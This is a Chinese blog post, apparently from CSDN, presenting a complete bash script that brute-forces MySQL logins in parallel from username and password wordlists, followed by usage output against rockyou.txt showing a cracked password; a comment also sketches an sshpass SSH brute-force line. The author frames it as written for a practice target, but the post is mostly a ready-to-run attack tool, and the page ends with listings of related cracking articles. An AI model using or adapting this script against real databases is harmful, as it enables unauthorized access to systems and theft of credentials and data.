【MySql密码爆破脚本】用于其他爆破工具无法使用的情况下

已于 2023-11-17 15:32:22 修改
阅读量592 收藏 3
点赞数 1
文章标签: mysql 渗透测试
于 2023-11-17 01:53:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43094965/article/details/134453647
版权

1、脚本

#!/bin/bash

# 脚本参数
username=$1  # MySQL用户(或字典路径)
password=$2  # MySQL密码(或字典路径)
task_num=${3:-32}  # 并发数,默认 32

# 检查参数是否存在
if [ -z "$username" ] || [ -z "$password" ]; then
    echo "请输入用户名(或字典路径)和密码(或字典路径)"
    echo "用法: ./mysql_login.sh username password"
    exit 1
fi

# 并发数,默认 32
if ! [[ $task_num =~ ^[0-9]+$ ]]; then
    task_num=32
fi

# 读取用户字典文件
echo '读取用户信息...'
if [ -f "$username" ]; then
    usernames=$(cat $username)
else
    usernames=$(echo $username | cat)
fi
# 读取密码字典文件
echo '读取密码信息...'
if [ -f "$password" ]; then
    passwords=$(cat $password)
else
    passwords=$(echo $password | cat)
fi

# 尝试登录函数
function try_mysql_login() {
    user=$1
    pswd=$2
    # 尝试登录MySQL
    output=$(mysql -u $user -p$pswd -e "exit" 2>&1)

    # 检查输出是否包含错误信息
    if [[ ! $output =~ 'ERROR' ]]; then
        echo "成功登录,用户密码为 -> $user : $pswd"
        # 获取当前脚本的 PID
        script_pid=$(ps -p $$ | grep -v PID | awk '{print $1}')
        # 强制结束当前脚本
        kill -s 9 $script_pid
    fi
}

function print_progress() {
    # 打印进度,如果一直没有输出,时间太长会感觉卡死了
    numb=$1
    task=$2
    snum=$3
    user=$4
    pswd=$5
    if [ $(($numb % ($task * 10))) -eq 0 ]; then
        echo "尝试登录进度($numb/$snum) -> $user : $pswd"
    fi
}

# 循环遍历密码字典
pool=0
count=0
total_tasks=$(($(echo "$usernames" | wc -l) * $(echo "$passwords" | wc -l)))
for username in $usernames; do
    echo "尝试用户: $username"
    for password in $passwords; do
        count=$((count + 1))
        # 等待空闲进程池中的任务
        while [ $pool -ge $task_num ]; do
          wait -n
          ((pool--))
        done
        
        # 创建新任务并加入进程池
        {
          try_mysql_login $username $password
          # 在这里执行具体的登录操作,例如使用ssh命令
          # 示例:sshpass -p "$password" ssh "$user"@hostname command
        } &
        ((pool++))
        print_progress $count $task_num $total_tasks $username $password
    done
done

# 等待所有进程完成
wait

echo "密码爆破失败"
exit 1

2、使用方法

使用场景:是一次打靶经历,内网容器,无法连接外网,又有很多命令失效,无法使用专门的MySql爆破工具,本人又很菜,就只能想到自己写一个sh的爆破脚本了。

(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# ./mysql_login.sh mike /usr/share/wordlists/rockyou.txt 64                 
尝试用户: mike
尝试登录进度 -> mike : pebbles
尝试登录进度 -> mike : poohbear1
尝试登录进度 -> mike : jacqueline
尝试登录进度 -> mike : scarlett
密码爆破失败

mike@host2:/tmp$ ./mysql_login.sh user.txt top500.txt
尝试用户: root
尝试登录进度 -> mike : pebbles
尝试登录进度 -> mike : poohbear1
尝试用户: mike
尝试登录进度 -> mike : pebbles
成功登录,密码为: password
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
弱口令-爆破Mysql
HAKUNAMATATATTA的博客
11-28 2089
mysql弱口令爆破工具 不仅仅是MySQL
第六天 02.mysql数据库的基本操作和密码爆破
qq_56414082的博客
01-02 996
​ 数据库是什么​ 存储数据的仓库,数据是有组织的进行存储。mysql是一种关系数据库管理系统使用工具:phpstudymysql 默认端口 3306。
Python 渗透测试:MySQL 数据库 弱密码测试.(3306 端口)
网络安全领域___专研者.
05-17 672
MySQL 是一种开源的关系型数据库管理系统(RDBMS)。它是目前世界上最流行的数据库之一,被广泛应用于各种类型的网站和应用程序中。MySQL 数据库爆破是一种非法和危险的黑客攻击手段。它指的是通过暴力猜测密码的方式,试图获取未授权访问 MySQL 数据库的行为。
mysql密码爆破及利用方法
m0_75198157的博客
04-08 924
inux kali2021中已经安装了mysql,所以可以在终端中使用mysql命令登录。在windows中,如果安装了mysql,在mysql/bin/mysql.exe。3、利用我们爆破出的用户名和密码使用mysql客户端登录远程mysql服务器。需要在mysql服务器上开启写入文件的权限。这个变量默认的值是空值,表示不允许写入。
利用MySQL暴力破解实现远程控制
末班车的博客
03-12 1953
MySQL数据库漏洞发现与利用
Python版Mysql爆破脚本
09-09
本文给大家分享的是使用Python制作的MySQL在线用户密码的暴力破解脚本,非常的好用,有需要的小伙伴可以参考下
PHP版Mysql爆破脚本
09-09
本文给大家分享的是使用php实现暴力破解mysql的小脚本代码,非常的好用,有需要的小伙伴可以参考下
K8CScan:K8Cscan大型内网渗透自定义插件化扫描神器,包含信息收集,网络资产,入侵扫描,密码爆破,突破利用,程序采用多线程堆叠扫描大型内网多个IP段C段主机,现有插件包含:C段旁注扫描,子域名扫描,Ftp密码爆破Mysql密码爆破,Oracle密码爆破,MSSQL密码爆破,WindowsLinux系统密码爆破,存活主机扫描,端口扫描,Web信息检测,操作系统版本检测,Cisco思科设备扫描等,支持调用任意外部程序或脚本,支持Cobalt Strike联动
02-03
K8Cscan5.4 20191101最新版Ladon程序简介K8Cscan一个专用于大型内网渗透的高并发插件化扫描神器,包含信息收集,网络资产,入侵扫描,密码爆破,突破利用,支持批量A段/ B段/ C段以及跨网段扫描。5.4版本内置28个...
Python编写固定字典爆破
最新发布
05-19
"使用方法.png"可能是展示如何运行这个爆破脚本的示意图。 值得注意的是,虽然这种技术在安全测试中具有实际应用,但它也可能会被滥用。因此,确保在合法授权和合适的环境下进行此类操作至关重要,否则可能触犯法律...
渗透测试-暴力破解之hydra
lza20001103的博客
04-18 4274
渗透测试-暴力破解之hydra
mysql数据库暴破
04-08
该资源为python编写的mysql暴力破解软件,采用多线程编写,爆破速度非常快。
Kali系统MSF模块暴力破解MySQL弱口令漏洞
wangluoanquan111的博客
02-23 1482
这里特别要注意MySQL需要启动允许远程访问,因为渗透环境是Kali虚拟机访问windows系统安装的MySQL环境,渗透成功的前提是MySQL允许远程访问,因为默认情况下小皮工具搭建的MySQL服务是仅允许本地访问的。攻击环境使用KALI系统(使用虚拟机搭建)的Metasploit模块,msfconsole是metasploit中的一个工具,它集成了很多漏洞的利用的脚本,并且使用起来很简单的网络安全工具。(2)RPORT 3306 是MySQL开启的端口号,默认是3306;
mysql 弱口令暴力破解本地渗透测试
m0_46827210的博客
04-14 4748
文章目录环境配置主机数据库使用 Hydra 工具进行暴力破解使用 metsploit 暴力破解基本模块基本命令 环境配置 主机 靶机: 本地Linux服务器虚拟机 + phpstudy 攻击主机:本地 Kali 虚拟机 配置好网络让主机之间相互可以通信 数据库 数据库版本:mysql 5.5.62 开启 mysql 远程连接 ,否则攻击主机无法建立与靶机数据库连接 我是直接在小皮面板中开启 修改 mysql 最大错误连接数量,默认为 100 ,改为 1000, 方便暴力破解 ​
密码爆破工具HashCat的安装与使用
OrientalGlass的博客
06-10 3763
下载压缩包后解压,在所在文件夹中打开cmd即可。
mysql爆破python脚本
m0_73896875的博客
07-06 250
print(f"成功登录 - 主机名:{hostname},用户名:{username},密码:{password}")print(f"登录失败 - 主机名:{hostname},用户名:{username},密码:{password}")print(f"成功登录 - 主机名:{hostname},用户名:{username},密码:{password}")print(f"登录失败 - 主机名:{hostname},用户名:{username},密码:{password}")@Author :星之尘。
利用python爆破mysql数据库
qq_52344654的博客
12-08 3059
使用python爆破mysql的操作
常见mysql密码爆破字典
07-15
常见的 MySQL 密码爆破字典包括以下几种: 1. 常见密码:这些密码是用户最常使用的,默认的密码或者弱密码,如 "123456", "password", "admin", "test" 等。 2. 字典密码:这些密码是从常见字典中提取的,包括常见的英文单词、数字组合、键盘上相邻按键等。 3. 弱密码规则:这些密码是根据一些弱密码规则生成的,如将单词逆序、大小写混合、数字替换为符号、重复字符等。 4. 社工密码:这些密码是通过社会工程学手段获取的,如用户的生日、家庭成员名字、手机号码等。 需要注意的是,使用这些密码字典进行爆破是一种不合法的行为,违反了网络安全法和个人隐私保护法。在实际应用中,应该采取安全措施,使用密码策略,并定期更换密码,以保护数据库的安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值